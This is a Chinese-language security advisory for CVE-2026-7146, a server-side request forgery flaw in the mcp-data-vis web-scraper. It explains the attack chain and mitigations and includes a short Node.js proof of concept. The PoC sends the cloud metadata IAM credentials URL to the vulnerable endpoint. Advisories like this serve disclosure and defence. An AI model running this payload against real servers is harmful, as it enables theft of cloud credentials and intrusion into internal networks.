CVE-2026-7146 mcp-data-vis 服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-7146

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AlejandroArciniegas mcp-data-vis

漏洞概述

AlejandroArciniegas开发的mcp-data-vis项目中存在严重的服务器端请求伪造（SSRF）漏洞。该漏洞位于src/servers/web-scraper/server.js文件的HTTP请求处理组件axios函数中。由于未对用户输入的URL进行有效过滤，远程攻击者无需身份认证即可诱导服务器向内网或任意外部地址发起请求。攻击者可利用此漏洞探测内网拓扑、窃取敏感数据或获取云元数据。目前漏洞利用代码已公开，且官方尚未发布修复补丁。

技术细节

该漏洞的根源在于mcp-data-vis的web-scraper组件在处理HTTP请求时，盲目信任用户提供的URL参数并将其直接传递给axios库执行。在src/servers/web-scraper/server.js代码逻辑中，程序缺少针对目标地址的校验逻辑（如私有IP地址黑名单或域名白名单）。攻击者可通过发送特制的HTTP请求，将目标URL参数指定为内网关键基础设施地址（如127.0.0.1、localhost、云平台元数据服务地址169.254.169.254）。由于CVSS向量显示攻击复杂度低（AC:L）、无需权限（PR:N）且无需用户交互（UI:N），攻击者可从互联网直接发起自动化攻击。成功利用后，攻击者可利用服务器作为跳板，绕过防火墙限制，读取本地敏感数据或进一步攻击内部系统。

攻击链分析

STEP 1

侦察

攻击者识别出互联网上运行AlejandroArciniegas mcp-data-vis组件的目标服务器。

STEP 2

构造恶意请求

攻击者构造包含恶意URL参数（如内网IP或元数据地址）的HTTP POST请求，指向web-scraper接口。

STEP 3

触发SSRF

服务器端接收请求，src/servers/web-scraper/server.js中的axios函数未经校验即向攻击者指定的内网地址发起连接。

STEP 4

数据回传

内网服务响应请求，服务器将获取到的敏感数据（如云凭证、配置信息）返回给攻击者。

STEP 5

后续利用

攻击者利用获取到的凭证或信息进一步渗透内网环境，造成更严重的数据泄露或系统破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-7146 (SSRF in mcp-data-vis)
 * This script demonstrates how to trigger the SSRF by sending a malicious URL
 * to the vulnerable endpoint.
 */

const axios = require('axios');

// The target URL of the vulnerable mcp-data-vis instance
const TARGET_URL = 'http://<victim-host>:<port>/api/scrape';

// Malicious internal URL (e.g., AWS metadata service)
const MALICIOUS_PAYLOAD = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
};

async function exploit() {
    try {
        console.log(`[+] Sending SSRF payload to ${TARGET_URL}...`);
        const response = await axios.post(TARGET_URL, MALICIOUS_PAYLOAD);
        console.log('[+] Response received from internal server:');
        console.log(response.data);
    } catch (error) {
        console.error('[-] Exploit failed:', error.message);
    }
}

exploit();

影响范围

AlejandroArciniegas mcp-data-vis <= commit de5a51525a69822290eaee569a1ab447b490746d

防御指南

临时缓解措施

由于官方尚未发布补丁，建议立即禁用受影响的web-scraper功能模块。如果必须使用，应在服务器出口防火墙或安全组中严格限制出站流量，禁止访问内网网段和云元数据服务IP（169.254.169.254）。开发人员可临时修改src/servers/web-scraper/server.js源码，引入URL校验库（如validator.js）过滤非法请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7146
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7146
3 Details https://www.cvedetails.com/cve/CVE-2026-7146/
4 VulDB https://vuldb.com/cve/CVE-2026-7146
5 Link https://github.com/AlejandroArciniegas/mcp-data-vis/
6 Link https://github.com/AlejandroArciniegas/mcp-data-vis/issues/1
7 Link https://vuldb.com/submit/801895
8 Link https://vuldb.com/vuln/359745
9 Link https://vuldb.com/vuln/359745/cti